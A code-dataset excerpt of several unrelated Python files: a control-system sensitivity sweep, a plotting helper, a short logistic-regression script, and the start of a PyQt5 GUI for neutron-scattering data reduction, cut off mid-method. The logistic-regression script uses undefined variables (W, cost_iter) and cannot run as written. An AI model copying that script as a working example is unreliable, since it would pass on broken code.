lqr_settle,'LQR',\n shaped_settle,'Shaped',\n name_append='Settle_Time_mp',\n xlabel='Payload Mass',ylabel='Settling Time (s)',\n folder=folder,grid=False,save_data=False,ncol=2,legend_loc='top',ymax=0.1,\n )\n\n\nJ_h1 = 0.1\nJ_h2 = np.arange(0,1,0.1)\nJ_p = 0.0005\n\nfor i in range(len(J_h2)):\n\n hub2_inertia = float(J_h2[i])\n J = [J_h1,hub2_inertia,J_p]\n\n # Derive the system using Kane's method\n Kane = twolink.derive_sys(n,[[0.1,m_h2],J, E, I])\n\n LQR_response,[unshaper,unshaper],LQR_Gains = twolink.response(\n n,Kane,p,LQR_Gains,LQR_Omegas,LQR_Zetas,\n Shaper1='Unshaped',Shaper2='Unshaped',\n motion='Step'\n )\n\n shaped_response,[Shaper,Shaper],Shaped_Gains = twolink.response(\n n,Kane,p,K_damped,Omegas_damp,Zetas_damp,\n Shaper1='ZV ZV ZV',Shaper2='ZV ZV ZV',\n motion='Step'\n )\n\n lqr_settle[i] = settling_time(LQR_response)\n shaped_settle[i] = settling_time(shaped_response)\n\ngenplt.compare_responses(J_h2 / 0.1,\n lqr_settle,'LQR',\n shaped_settle,'Shaped',\n name_append='Settle_Time_Jh2',\n xlabel='Payload Mass',ylabel='Settling Time (s)',\n folder=folder,grid=False,save_data=False,ncol=2,legend_loc='top',ymax=0.1,\n )\n\n\nJ_h1 = np.arange(0,1,0.1)\nJ_h2 = 0.1\nJ_p = 0.0005\nm_p = 1\n\nfor i in range(len(J_h1)):\n\n hub1_inertia = float(J_h1[i])\n J = [hub1_inertia,J_h2,J_p]\n\n # Derive the system using Kane's method\n Kane = twolink.derive_sys(n,[[m_p,m_h2],J, E, I])\n\n LQR_response,[unshaper,unshaper],LQR_Gains = twolink.response(\n n,Kane,p,LQR_Gains,LQR_Omegas,LQR_Zetas,\n Shaper1='Unshaped',Shaper2='Unshaped',\n motion='Step'\n )\n\n shaped_response,[Shaper,Shaper],Shaped_Gains = twolink.response(\n n,Kane,p,K_damped,Omegas_damp,Zetas_damp,\n Shaper1='ZV ZV ZV',Shaper2='ZV ZV ZV',\n motion='Step'\n )\n\n lqr_settle[i] = settling_time(LQR_response)\n shaped_settle[i] = settling_time(shaped_response)\n\ngenplt.compare_responses(J_h1 / 0.1,\n lqr_settle,'LQR',\n shaped_settle,'Shaped',\n name_append='Settle_Time_Jh1',\n xlabel='Payload Mass',ylabel='Settling Time (s)',\n folder=folder,grid=False,save_data=False,ncol=2,legend_loc='top',ymax=0.1,\n )\n'''\nE = np.arange(0.1,1,0.01)\n\nJ_h1 = 0.1\nJ_h2 = 0.1\nJ_p = 0.0005\nm_p = 1\n\nlqr_settle = np.zeros(len(E))\nshaped_settle = np.zeros(len(E))\nsubopt_settle = np.zeros(len(E))\n\nfor i in range(len(E)):\n\n stiffness = E[i]\n J = [J_h1,J_h2,J_p]\n\n # Derive the system using Kane's method\n Kane = twolink.derive_sys(n,[[m_p,m_h2],J, stiffness, I])\n\n LQR_response,[unshaper,unshaper],LQR_Gains = twolink.response(\n n,Kane,p,LQR_Gains,LQR_Omegas,LQR_Zetas,\n Shaper1='Unshaped',Shaper2='Unshaped',\n motion='Step'\n )\n\n subopt_response,[unshaper,unshaper],LQR_Gains = twolink.response(\n n,Kane,p,LQR_Gains,LQR_Omegas,LQR_Zetas,\n Shaper1='ZV ZV ZV',Shaper2='ZV ZV ZV',\n motion='Step'\n )\n\n shaped_response,[Shaper,Shaper],Shaped_Gains = twolink.response(\n n,Kane,p,K_damped,Omegas_damp,Zetas_damp,\n Shaper1='ZV ZV ZV',Shaper2='ZV ZV ZV',\n motion='Step'\n )\n\n lqr_settle[i] = settling_time(LQR_response)\n shaped_settle[i] = settling_time(shaped_response)\n subopt_settle[i] = settling_time(subopt_response)\n\n print('LQR Settle: {}'.format(lqr_settle[i]))\n print('Shaped Settle: {}'.format(shaped_settle[i]))\n print('Shaped Sub Settle: {}'.format(subopt_settle[i]))\n\ngenplt.compare_responses(E / 1,\n lqr_settle,'LQR',\n shaped_settle,'Shaped',\n subopt_settle,'Subopt',\n name_append='Settle_Time_E1',\n xlabel='Payload Mass',ylabel='Settling Time (s)',\n folder=folder,grid=False,save_data=False,ncol=2,legend_loc='top',ymax=0.1,\n )","sub_path":"Code/Paper_Simulations/Thesis/Concurrent/sensitivity.py","file_name":"sensitivity.py","file_ext":"py","file_size_in_byte":9250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"284739912","text":"## Do NOT modify the code in this file\nimport matplotlib as mpl\n\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nplt.style.use('ggplot')\n\n# save the visualization of weights into a file\ndef save_fig(args, inner_matrix, inner_file_name):\n inner_fig = plt.figure()\n for i in range(inner_matrix.shape[0]):\n ax = inner_fig.add_subplot(1, inner_matrix.shape[0], i + 1)\n ax.imshow(inner_matrix[i].reshape(args.image_fashion_mnist_width, args.image_fashion_mnist_height))\n plt.xticks([])\n plt.yticks([])\n inner_fig.savefig(inner_file_name)\n plt.close(inner_fig)\n","sub_path":"Assignment3/template/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"294009227","text":"\n# A.T. January 27 2016\n# LogisticRegression.py\n# A program for Logistic Regression\n# Copyright 2016 Amirhessam Tahmassebi \n\n# Loading Packages\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\n# Loading Data Set: Hill-Valley\n\nX = np.loadtxt(\"./X.dat\")\nY = np.loadtxt(\"./Y.dat\")\nX_Test = np.loadtxt(\"./Xtest.dat\")\nY_Test = np.loadtxt(\"./Ytest.dat\")\n\n# Function for Logistic Function\n\ndef logistic_func(W, X):\n return float(1) / (1 + math.e**(-X.dot(W)))\n \n# Function for Cost \ndef cost_func(W, X, Y):\n log_func_v = logistic_func(W,X)\n Y = np.squeeze(Y)\n step1 = Y * np.log(log_func_v)\n step2 = (1-Y) * np.log(1 - log_func_v)\n final = -step1 - step2\n return np.mean(final)\n \n# Function for Logistic Gradient \n\ndef log_gradient(W, X, Y):\n first_calc = logistic_func(W, X) - np.squeeze(Y)\n final_calc = first_calc.T.dot(X)\n return final_calc\n \n\ndef grad_desc(W, X, Y, lr=.001, converge_change=.001):\n\t\n #normalize\n X = (X - np.mean(X, axis=0)) / np.std(X, axis=0)\n #setup cost iter\n cost_iter = []\n cost = cost_func(W, X, Y)\n cost_iter.append([0, cost])\n change_cost = 1\n i = 1\n while(change_cost > converge_change):\n old_cost = cost\n W = W - (lr * log_gradient(W, X, Y))\n cost = cost_func(W, X, Y)\n cost_iter.append([i, cost])\n change_cost = old_cost - cost\n i+=1\n return W, np.array(cost_iter)\n\ngrad_desc(W,X, Y, lr=.001, converge_change=.001)\n#print W_values, cost_iter\n# Ploting the Errors versus Max Depth\nfig = plt.figure()\nplt.title('Data : HILL-VALLEY')\t\nL1, = plt.plot(np.array(cost_iter),W,'-bo', label = \"Training Error\")\n#L2, = plt.plot(range(1,13),Testing_Error,'-r*', label = \"Testing Error\")\nplt.ylabel('Misclassification Error')\nplt.xlabel('Iteration ')\nplt.legend()\nplt.grid(True)\nplt.show()\n","sub_path":"LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"166438515","text":"#!/usr/bin/env python\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets # Import the PyQt5 module we'll need\nfrom shutil import copyfile\nimport sys # We need sys so that we can pass argv to QApplication\nfrom subprocess import PIPE, Popen\nimport signal\nimport design # This file holds our MainWindow and all design related things\nimport mod3.ReduceDictionary as ReduceDictionary\nimport shlex\nimport math\nimport time\n\n# it also keeps events etc that we defined in Qt Designer\nimport os # For listing filepath methods\nimport string\n\nclass MantidReduction(QtWidgets.QMainWindow, design.Ui_MainWindow):\n def __init__(self):\n # Explaining super is out of the scope of this article\n # So please google it if you're not familar with it\n # Simple reason why we use it here is that it allows us to\n # access variables, methods etc in the design.py file\n super(self.__class__, self).__init__()\n self.setupUi(self) # This is defined in design.py file automatically\n # It sets up layout and widgets that are defined\n self.setDefaults()\n self.ConfigFileName_ledt.textChanged.connect(self.change_Configfile)\n self.ConfigFile_btn.clicked.connect(self.Configbrowse_file) # When the button is pressed\n self.BackgroundFileName_ledt.textChanged.connect(self.change_file)\n self.BackgroundFile_btn.clicked.connect(self.browse_file) # When the button is pressed\n self.UBFileName_ledt.textChanged.connect(self.change_UBfile)\n self.UBFile_btn.clicked.connect(self.UBbrowse_file) # When the button is pressed\n self.instrument_cmbx.currentIndexChanged.connect(self.change_instrument)\n self.z_score_ledt.textChanged.connect(self.input_z_score)\n self.bkg_inner_radius_ledt.textChanged.connect(self.input_bkg_inner_radius)\n self.bkg_outer_radius_ledt.textChanged.connect(self.input_bkg_outer_radius)\n self.CalFileName_ledt.textChanged.connect(self.change_cal_file)\n self.CalFile_btn.clicked.connect(self.browse_cal_file) # When the button is pressed\n self.spectraFileName_ledt.textChanged.connect(self.change_spectra_file)\n self.spectraFile_btn.clicked.connect(self.browse_spectra_file) # When the button is pressed\n self.pred_minDSpacing_ledt.textChanged.connect(self.change_pred_minDSpacing)\n self.pred_maxDSpacing_ledt.textChanged.connect(self.change_pred_maxDSpacing)\n self.pred_minWavelength_ledt.textChanged.connect(self.change_pred_minWavelength)\n self.pred_maxWavelength_ledt.textChanged.connect(self.change_pred_maxWavelength)\n self.minDSpacing_ledt.textChanged.connect(self.change_minDSpacing)\n self.minWavelength_ledt.textChanged.connect(self.change_minWavelength)\n self.maxWavelength_ledt.textChanged.connect(self.change_maxWavelength)\n self.pointGroup_cmbx.currentIndexChanged.connect(self.change_pointGroup)\n self.laueGroup_cmbx.currentIndexChanged.connect(self.change_laueGroup)\n self.centering_cmbx.currentIndexChanged.connect(self.change_centering)\n self.sampleRadius_ledt.textChanged.connect(self.change_sampleRadius)\n self.molecularFormula_ledt.textChanged.connect(self.change_molecularFormula)\n self.expName_ledt.textChanged.connect(self.change_expName)\n self.runNums_ledt.textChanged.connect(self.change_runNums)\n self.Z_ledt.textChanged.connect(self.change_Z)\n self.unitCellVolume_ledt.textChanged.connect(self.change_unitCellVolume)\n self.splitThreshold_ledt.textChanged.connect(self.change_splitThreshold)\n self.maxQspace_ledt.textChanged.connect(self.change_maxQ)\n self.maxQspace_ledt_2.editingFinished.connect(self.change_maxQ2)\n self.numberPeaks_ledt.textChanged.connect(self.change_numPeaks)\n self.minABC_ledt.textChanged.connect(self.change_minABC)\n self.maxABC_ledt.textChanged.connect(self.change_maxABC)\n self.tolerance_ledt.textChanged.connect(self.change_tolerance)\n self.peakRadius_ledt.textChanged.connect(self.change_peakRadius)\n self.minIntensity_ledt.textChanged.connect(self.change_minIntensity)\n self.normToWavelength_ledt.textChanged.connect(self.change_normToWavelength)\n self.predictPeaks_chbx.stateChanged.connect(self.predict_peaks) # When the button is pressed\n self.modStruct_chbx.stateChanged.connect(self.plot_modStruct) # When the button is pressed\n self.live_chbx.stateChanged.connect(self.change_live) # When the button is pressed\n self.minIsigI_ledt.textChanged.connect(self.change_minIsigI)\n self.scaleFactor_ledt.textChanged.connect(self.change_scaleFactor)\n self.edgePixels_ledt.textChanged.connect(self.change_edgePixels)\n self.starting_batch_number_ledt.textChanged.connect(self.change_starting_batch_number)\n self.borderPixels_ledt.textChanged.connect(self.change_borderPixels)\n self.ellipse_size_specified_chbx.stateChanged.connect(self.ellipse_size) # When the button is pressed\n self.dataDirectory_ledt.textChanged.connect(self.change_datadir)\n self.dataDirectory_btn.clicked.connect(self.browse_datadir) # When the button is pressed\n self.PushButton_config.clicked.connect(self.accept) # When the button is pressed\n self.PushButton_auto.clicked.connect(self.auto) # When the button is pressed\n self.PushButton_run.clicked.connect(self.run) # When the button is pressed\n self.PushButton_kill.clicked.connect(self.reject) # When the button is pressed\n #plot data\n self.h1.currentIndexChanged.connect(self.change_h1)\n self.k1.currentIndexChanged.connect(self.change_k1)\n self.l1.currentIndexChanged.connect(self.change_l1)\n self.xmin1.textChanged.connect(self.change_xmin1)\n self.xmax1.textChanged.connect(self.change_xmax1)\n self.xsteps1.textChanged.connect(self.change_xsteps1)\n self.ymin1.textChanged.connect(self.change_ymin1)\n self.ymax1.textChanged.connect(self.change_ymax1)\n self.ysteps1.textChanged.connect(self.change_ysteps1)\n self.slice1.textChanged.connect(self.change_slice1)\n self.thickness1.textChanged.connect(self.change_thickness1)\n self.h2.currentIndexChanged.connect(self.change_h2)\n self.k2.currentIndexChanged.connect(self.change_k2)\n self.l2.currentIndexChanged.connect(self.change_l2)\n self.xmin2.textChanged.connect(self.change_xmin2)\n self.xmax2.textChanged.connect(self.change_xmax2)\n self.xsteps2.textChanged.connect(self.change_xsteps2)\n self.ymin2.textChanged.connect(self.change_ymin2)\n self.ymax2.textChanged.connect(self.change_ymax2)\n self.ysteps2.textChanged.connect(self.change_ysteps2)\n self.slice2.textChanged.connect(self.change_slice2)\n self.thickness2.textChanged.connect(self.change_thickness2)\n self.h3.currentIndexChanged.connect(self.change_h3)\n self.k3.currentIndexChanged.connect(self.change_k3)\n self.l3.currentIndexChanged.connect(self.change_l3)\n self.xmin3.textChanged.connect(self.change_xmin3)\n self.xmax3.textChanged.connect(self.change_xmax3)\n self.xsteps3.textChanged.connect(self.change_xsteps3)\n self.ymin3.textChanged.connect(self.change_ymin3)\n self.ymax3.textChanged.connect(self.change_ymax3)\n self.ysteps3.textChanged.connect(self.change_ysteps3)\n self.slice3.textChanged.connect(self.change_slice3)\n self.thickness3.textChanged.connect(self.change_thickness3)\n self.FluxFile_ledt.textChanged.connect(self.change_Fluxfile)\n self.FluxFile_btn.clicked.connect(self.Fluxbrowse_file) # When the button is pressed\n self.SAFile_ledt.textChanged.connect(self.change_SAfile)\n self.SAFile_btn.clicked.connect(self.SAbrowse_file) # When the button is pressed\n # satellite\n self.tolerance_satellite_ledt.textChanged.connect(self.change_tolerance_satellite)\n self.mod_vec_1_dh_ledt.textChanged.connect(self.change_mod_vec_1_dh)\n self.mod_vec_1_dk_ledt.textChanged.connect(self.change_mod_vec_1_dk)\n self.mod_vec_1_dl_ledt.textChanged.connect(self.change_mod_vec_1_dl)\n self.mod_vec_2_dh_ledt.textChanged.connect(self.change_mod_vec_2_dh)\n self.mod_vec_2_dk_ledt.textChanged.connect(self.change_mod_vec_2_dk)\n self.mod_vec_2_dl_ledt.textChanged.connect(self.change_mod_vec_2_dl)\n self.mod_vec_3_dh_ledt.textChanged.connect(self.change_mod_vec_3_dh)\n self.mod_vec_3_dk_ledt.textChanged.connect(self.change_mod_vec_3_dk)\n self.mod_vec_3_dl_ledt.textChanged.connect(self.change_mod_vec_3_dl)\n self.max_order_ledt.textChanged.connect(self.change_max_order)\n self.cross_terms_chbx.stateChanged.connect(self.change_cross_terms) \n self.save_mod_info_chbx.stateChanged.connect(self.change_save_mod_info) \n self.sat_peak_region_radius_ledt.textChanged.connect(self.change_sat_peak_region_radius)\n self.sat_peak_radius_ledt.textChanged.connect(self.change_sat_peak_radius)\n self.sat_peak_inner_radius_ledt.textChanged.connect(self.change_sat_peak_inner_radius)\n self.sat_peak_outer_radius_ledt.textChanged.connect(self.change_sat_peak_outer_radius)\n self.satellite_chbx.stateChanged.connect(self.hide_satellites)\n self.tabWidget.setTabEnabled(3, self.satellite_chbx.isChecked())\n \n def hide_satellites(self):\n self.tabWidget.setTabEnabled(3, self.satellite_chbx.isChecked())\n self.max_order = self.max_order_ledt.text() if self.satellite_chbx.isChecked() else 0\n \n def change_h1(self):\n self._h1 = self.h1.currentText()\n\n def change_k1(self):\n self._k1 = self.k1.currentText()\n\n def change_l1(self):\n self._l1 = self.l1.currentText()\n\n def change_xmin1(self):\n self._xmin1 = self.toDouble(self.xmin1.text())\n\n def change_xmax1(self):\n self._xmax1 = self.toDouble(self.xmax1.text())\n\n def change_xsteps1(self):\n self._xsteps1 = self.toInt(self.xsteps1.text())\n\n def change_ymin1(self):\n self._ymin1 = self.toDouble(self.ymin1.text())\n\n def change_ymax1(self):\n self._ymax1 = self.toDouble(self.ymax1.text())\n\n def change_ysteps1(self):\n self._ysteps1 = self.toInt(self.ysteps1.text())\n\n def change_slice1(self):\n self._slice1 = self.toDouble(self.slice1.text())\n thickness1 = self.toFloat(self._thickness1)\n self._zmin1 = self._slice1 - 0.5 * thickness1\n self._zmax1 = self._slice1 + 0.5 * thickness1\n\n def change_thickness1(self):\n self._thickness1 = self.toDouble(self.thickness1.text())\n slice1 = self.toFloat(self._slice1)\n self._zmin1 = slice1 - 0.5 * self._thickness1\n self._zmax1 = slice1 + 0.5 * self._thickness1\n\n def change_h2(self):\n self._h2 = self.h2.currentText()\n\n def change_k2(self):\n self._k2 = self.k2.currentText()\n\n def change_l2(self):\n self._l2 = self.l2.currentText()\n\n def change_xmin2(self):\n self._xmin2 = self.toDouble(self.xmin2.text())\n\n def change_xmax2(self):\n self._xmax2 = self.toDouble(self.xmax2.text())\n\n def change_xsteps2(self):\n self._xsteps2 = self.toInt(self.xsteps2.text())\n\n def change_ymin2(self):\n self._ymin2 = self.toDouble(self.ymin2.text())\n\n def change_ymax2(self):\n self._ymax2 = self.toDouble(self.ymax2.text())\n\n def change_ysteps2(self):\n self._ysteps2 = self.toInt(self.ysteps2.text())\n\n def change_slice2(self):\n self._slice2 = self.toDouble(self.slice2.text())\n thickness2 = self.toFloat(self._thickness2)\n self._zmin2 = self._slice2 - 0.5 * thickness2\n self._zmax2 = self._slice2 + 0.5 * thickness2\n\n def change_thickness2(self):\n self._thickness2 = self.toDouble(self.thickness2.text())\n slice2 = self.toFloat(self._slice2)\n self._zmin2 = slice2 - 0.5 * self._thickness2\n self._zmax2 = slice2 + 0.5 * self._thickness2\n\n def change_h3(self):\n self._h3 = self.h3.currentText()\n\n def change_k3(self):\n self._k3 = self.k3.currentText()\n\n def change_l3(self):\n self._l3 = self.l3.currentText()\n\n def change_xmin3(self):\n self._xmin3 = self.toDouble(self.xmin3.text())\n\n def change_xmax3(self):\n self._xmax3 = self.toDouble(self.xmax3.text())\n\n def change_xsteps3(self):\n self._xsteps3 = self.toInt(self.xsteps3.text())\n\n def change_ymin3(self):\n self._ymin3 = self.toDouble(self.ymin3.text())\n\n def change_ymax3(self):\n self._ymax3 = self.toDouble(self.ymax3.text())\n\n def change_ysteps3(self):\n self._ysteps3 = self.toInt(self.ysteps3.text())\n\n def change_slice3(self):\n self._slice3 = self.toDouble(self.slice3.text())\n thickness3 = self.toFloat(self._thickness3)\n self._zmin3 = self._slice3 - 0.5 * thickness3\n self._zmax3 = self._slice3 + 0.5 * thickness3\n\n def change_thickness3(self):\n self._thickness3 = self.toDouble(self.thickness3.text())\n slice3 = self.toFloat(self._slice3)\n self._zmin3 = slice3 - 0.5 * self._thickness3\n self._zmax3 = slice3 + 0.5 * self._thickness3\n\n def format_template(self, name, outfile, **kwargs):\n \"This fills in the values for the template called 'name' and writes it to 'outfile'\"\n template = open(name).read()\n formatter = string.Formatter()\n data = formatter.format(template, **kwargs)\n f = open(outfile, \"w\")\n try:\n f.write(data)\n finally:\n f.close()\n\n def setDefaults(self):\n self.molecularFormula = \"\"\n self.Z = str( 0.0)\n self.unitCellVolume = str( 0.0)\n self.sampleRadius = str( 0.0)\n self.centering = \"P\"\n self.laueGroup = \"Triclinic\"\n self.pointGroup = \"-1\"\n self.instrument = \"TOPAZ\"\n self.runNums = \"\"\n baseDir = os.getcwd()\n self.dataDirectory = baseDir[:baseDir.find(\"shared\")]+\"nexus\"\n self.dataDirectory_ledt.setText(self.dataDirectory)\n self.expName = \"\"\n self.calFileName = \"/SNS/TOPAZ/shared/calibrations/2019A/Calibration/TOPAZ_2019A.DetCal\"\n self.subtract_bkg = str( False)\n self.backgroundFileName = \"None\"\n self.read_UB = str( False)\n self.UBFileName = \"None\"\n self.maxQ = str(17.0)\n self.splitThreshold = str(80)\n self.edgePixels = str(0)\n self.numPeaksToFind = str( 500)\n self.abcMin = str( 3)\n self.abcMax = str( 18)\n self.tolerance = str( 0.12)\n self.predictPeaks = str( True)\n self.live = False\n self.pred_minDSpacing = str( 0.499)\n self.pred_maxDSpacing = str( 11.0)\n self.pred_minWavelength = str( 0.4)\n self.pred_maxWavelength = str( 3.45)\n self.ellipse_size_specified = str( True)\n self.peakRadius = str( 0.11)\n self.bkg_inner_radius = str( 0.115)\n self.bkg_outer_radius = str( 0.14)\n self.spectraFileName='/SNS/TOPAZ/shared/calibrations/2019A/Calibration/Spectrum_32751_32758.dat'\n self.normToWavelength = str(1.0)\n self.scaleFactor = str(0.05)\n self.minIntensity = str( 10)\n self.minIsigI = str(2.0)\n self.borderPixels = str(18)\n self.minDSpacing = str( 0.5)\n self.minWavelength = str( 0.4)\n self.maxWavelength = str( 3.5)\n self.z_score = str( 4.0)\n self.starting_batch_number = str( 1)\n self.modStruct = False\n self._h1 = \"H\"\n self._k1 = \"K\"\n self._l1 = \"L\"\n self._xmin1 = \"\"\n self._xmax1 = \"\"\n self._xsteps1 = str(400)\n self._ymin1 = \"\"\n self._ymax1 = \"\"\n self._ysteps1 = str(400)\n self._slice1 = str(0.0)\n self._thickness1 = str(0.1)\n self._zmin1 = str(-0.005)\n self._zmax1 = str(0.005)\n self._h2 = \"H\"\n self._k2 = \"L\"\n self._l2 = \"K\"\n self._xmin2 = \"\"\n self._xmax2 = \"\"\n self._xsteps2 = str(400)\n self._ymin2 = \"\"\n self._ymax2 = \"\"\n self._ysteps2 = str(400)\n self._slice2 = str(0.0)\n self._thickness2 = str(0.1)\n self._zmin2 = str(-0.005)\n self._zmax2 = str(0.005)\n self._h3 = \"K\"\n self._k3 = \"L\"\n self._l3 = \"H\"\n self._xmin3 = \"\"\n self._xmax3 = \"\"\n self._xsteps3 = str(400)\n self._ymin3 = \"\"\n self._ymax3 = \"\"\n self._ysteps3 = str(400)\n self._slice3 = str(0.0)\n self._thickness3 = str(0.1)\n self._zmin3 = str(-0.005)\n self._zmax3 = str(0.005)\n self.SAFile = \"\"\n self.FluxFile = \"\"\n\n def loadConfig(self, config_file_name):\n params_dictionary = ReduceDictionary.LoadDictionary( config_file_name )\n self.molecularFormula = str(params_dictionary[ \"formulaString\" ])\n self.molecularFormula_ledt.setText(self.molecularFormula)\n self.Z = str(self.toFloat(params_dictionary[ \"zParameter\" ]))\n self.Z_ledt.setText(self.Z)\n self.unitCellVolume = str(self.toFloat(params_dictionary[ \"unitCellVolume\" ]))\n self.unitCellVolume_ledt.setText(self.unitCellVolume)\n self.sampleRadius = str(self.toFloat(params_dictionary.get(\"sampleRadius\",'1.0')))\n self.sampleRadius_ledt.setText(self.sampleRadius)\n self.centering = str(params_dictionary[ \"centering\" ])\n self.centering_cmbx.setCurrentIndex(self.centering_cmbx.findText(self.centering, QtCore.Qt.MatchFixedString))\n self.laueGroup = str(params_dictionary[ \"cell_type\" ])\n self.laueGroup_cmbx.setCurrentIndex(self.laueGroup_cmbx.findText(self.laueGroup, QtCore.Qt.MatchFixedString))\n self.pointGroup = str(params_dictionary[\"pg_symbol\"])\n self.pointGroup_cmbx.setCurrentIndex(self.pointGroup_cmbx.findText(self.pointGroup, QtCore.Qt.MatchFixedString))\n self.instrument = str(params_dictionary[ \"instrument_name\" ])\n self.instrument_cmbx.setCurrentIndex(self.instrument_cmbx.findText(self.instrument, QtCore.Qt.MatchFixedString))\n file = open(config_file_name)\n for line in file:\n line = line.strip();\n line = line.rstrip();\n if (not line.startswith('#')) and len(line) > 2:\n words = shlex.split(line)\n if len(words) > 1:\n if words[0] == \"run_nums\":\n self.runNums = words[1]\n self.runNums = str(self.runNums).strip('[]')\n self.runNums = self.runNums.replace(\" \", \"\")\n self.runNums = self.runNums.replace(\"'\", \"\")\n self.runNums_ledt.setText(self.runNums)\n self.dataDirectory=str(params_dictionary[ \"data_directory\" ])\n self.dataDirectory_ledt.setText(self.dataDirectory)\n #Do not copy experiment name so you will not overwrite previous data\n #self.expName = str(params_dictionary[ \"exp_name\" ])\n self.expName_ledt.setText(self.expName)\n self.calFileName = str(params_dictionary[ \"calibration_file_1\" ])\n self.CalFileName_ledt.setText(self.calFileName)\n self.subtract_bkg = params_dictionary[ \"subtract_bkg\" ]\n self.backgroundFileName = str(params_dictionary[ \"no_sample_event_nxs_fname\" ])\n self.BackgroundFileName_ledt.setText(self.backgroundFileName)\n self.read_UB = params_dictionary[ \"read_UB\" ]\n self.UBFileName = str(params_dictionary[ \"UB_filename\" ])\n self.UBFileName_ledt.setText(self.UBFileName)\n self.maxQ = str(params_dictionary.get('Qmax', \"20\"))\n self.maxQspace_ledt.setText(self.maxQ)\n self.splitThreshold = str(params_dictionary[ \"split_threshold\" ])\n self.splitThreshold_ledt.setText(self.splitThreshold)\n self.edgePixels = str(params_dictionary[ \"n_bad_edge_pixels\" ])\n self.edgePixels_ledt.setText(self.edgePixels)\n self.numPeaksToFind = str(params_dictionary[ \"num_peaks_to_find\" ])\n self.numberPeaks_ledt.setText(self.numPeaksToFind)\n self.abcMin = str(params_dictionary[ \"min_d\" ])\n self.minABC_ledt.setText(self.abcMin)\n self.abcMax = str(params_dictionary[ \"max_d\" ])\n self.maxABC_ledt.setText(self.abcMax)\n self.tolerance = str(params_dictionary[ \"tolerance\" ])\n self.tolerance_ledt.setText(self.tolerance)\n self.predictPeaks = self.toBool(params_dictionary[ \"integrate_predicted_peaks\" ])\n self.predictPeaks_chbx.setChecked(self.predictPeaks)\n self.pred_minDSpacing = str(params_dictionary[ \"min_pred_dspacing\" ])\n self.pred_minDSpacing_ledt.setText(self.pred_minDSpacing)\n self.pred_maxDSpacing = str(params_dictionary[ \"max_pred_dspacing\" ])\n self.pred_maxDSpacing_ledt.setText(self.pred_maxDSpacing)\n self.pred_minWavelength = str(params_dictionary[ \"min_pred_wl\" ])\n self.pred_minWavelength_ledt.setText(self.pred_minWavelength)\n self.pred_maxWavelength = str(params_dictionary[ \"max_pred_wl\" ])\n self.pred_maxWavelength_ledt.setText(self.pred_maxWavelength)\n self.ellipse_size_specified = self.toBool(params_dictionary[ \"ellipse_size_specified\" ])\n self.ellipse_size_specified_chbx.setChecked(self.ellipse_size_specified)\n self.peakRadius = str(params_dictionary[ \"peak_radius\" ])\n self.peakRadius_ledt.setText(self.peakRadius)\n self.bkg_inner_radius = str(params_dictionary[ \"bkg_inner_radius\" ])\n self.bkg_inner_radius_ledt.setText(self.bkg_inner_radius)\n self.bkg_outer_radius = str(params_dictionary[ \"bkg_outer_radius\" ])\n self.bkg_outer_radius_ledt.setText(self.bkg_outer_radius)\n self.spectraFileName = str(params_dictionary[\"spectraFile\"])\n self.spectraFileName_ledt.setText(self.spectraFileName)\n self.normToWavelength = str(self.toFloat(params_dictionary[\"normToWavelength\"]))\n self.normToWavelength_ledt.setText(self.normToWavelength)\n self.scaleFactor = str(self.toFloat(params_dictionary[\"scaleFactor\"]))\n self.scaleFactor_ledt.setText(self.scaleFactor)\n self.minIntensity = str(self.toFloat(params_dictionary[\"intiMin\"]))\n self.minIntensity_ledt.setText(self.minIntensity)\n self.minIsigI = str(self.toFloat(params_dictionary[\"minIsigI\"]))\n self.minIsigI_ledt.setText(self.minIsigI)\n self.borderPixels = str(self.toInt(params_dictionary[\"numBorderCh\"]))\n self.borderPixels_ledt.setText(self.borderPixels)\n self.minDSpacing = str(self.toFloat(params_dictionary[\"dMin\"]))\n self.minDSpacing_ledt.setText(self.minDSpacing)\n self.minWavelength = str(self.toFloat(params_dictionary[\"wlMin\"]))\n self.minWavelength_ledt.setText(self.minWavelength)\n self.maxWavelength = str(self.toFloat(params_dictionary[\"wlMax\"]))\n self.maxWavelength_ledt.setText(self.maxWavelength)\n self.z_score = str(self.toFloat(params_dictionary[\"z_score\"]))\n self.z_score_ledt.setText(self.z_score)\n self.starting_batch_number = str(self.toInt(params_dictionary.get(\"starting_batch_number\",'1')))\n self.starting_batch_number_ledt.setText(self.starting_batch_number)\n self.tolerance_satellite = str(params_dictionary[ \"tolerance_satellite\" ])\n self.tolerance_satellite_ledt.setText(self.tolerance_satellite)\n mod_vec_1 = str(params_dictionary[ \"mod_vector1\" ])\n mod_vec_2 = str(params_dictionary[ \"mod_vector2\" ])\n mod_vec_3 = str(params_dictionary[ \"mod_vector3\" ])\n self.mod_vec_1_dh = mod_vec_1.split(',')[0]\n self.mod_vec_1_dk = mod_vec_1.split(',')[1]\n self.mod_vec_1_dl = mod_vec_1.split(',')[2]\n self.mod_vec_2_dh = mod_vec_2.split(',')[0]\n self.mod_vec_2_dk = mod_vec_2.split(',')[1]\n self.mod_vec_2_dl = mod_vec_2.split(',')[2]\n self.mod_vec_3_dh = mod_vec_3.split(',')[0]\n self.mod_vec_3_dk = mod_vec_3.split(',')[1]\n self.mod_vec_3_dl = mod_vec_3.split(',')[2]\n self.mod_vec_1_dh_ledt.setText(self.mod_vec_1_dh)\n self.mod_vec_1_dk_ledt.setText(self.mod_vec_1_dk)\n self.mod_vec_1_dl_ledt.setText(self.mod_vec_1_dl)\n self.mod_vec_2_dh_ledt.setText(self.mod_vec_2_dh)\n self.mod_vec_2_dk_ledt.setText(self.mod_vec_2_dk)\n self.mod_vec_2_dl_ledt.setText(self.mod_vec_2_dl)\n self.mod_vec_3_dh_ledt.setText(self.mod_vec_3_dh)\n self.mod_vec_3_dk_ledt.setText(self.mod_vec_3_dk)\n self.mod_vec_3_dl_ledt.setText(self.mod_vec_3_dl)\n self.max_order = str(params_dictionary[ \"max_order\" ])\n self.max_order_ledt.setText(self.max_order)\n self.satellite_chbx.setChecked(self.max_order > 0)\n 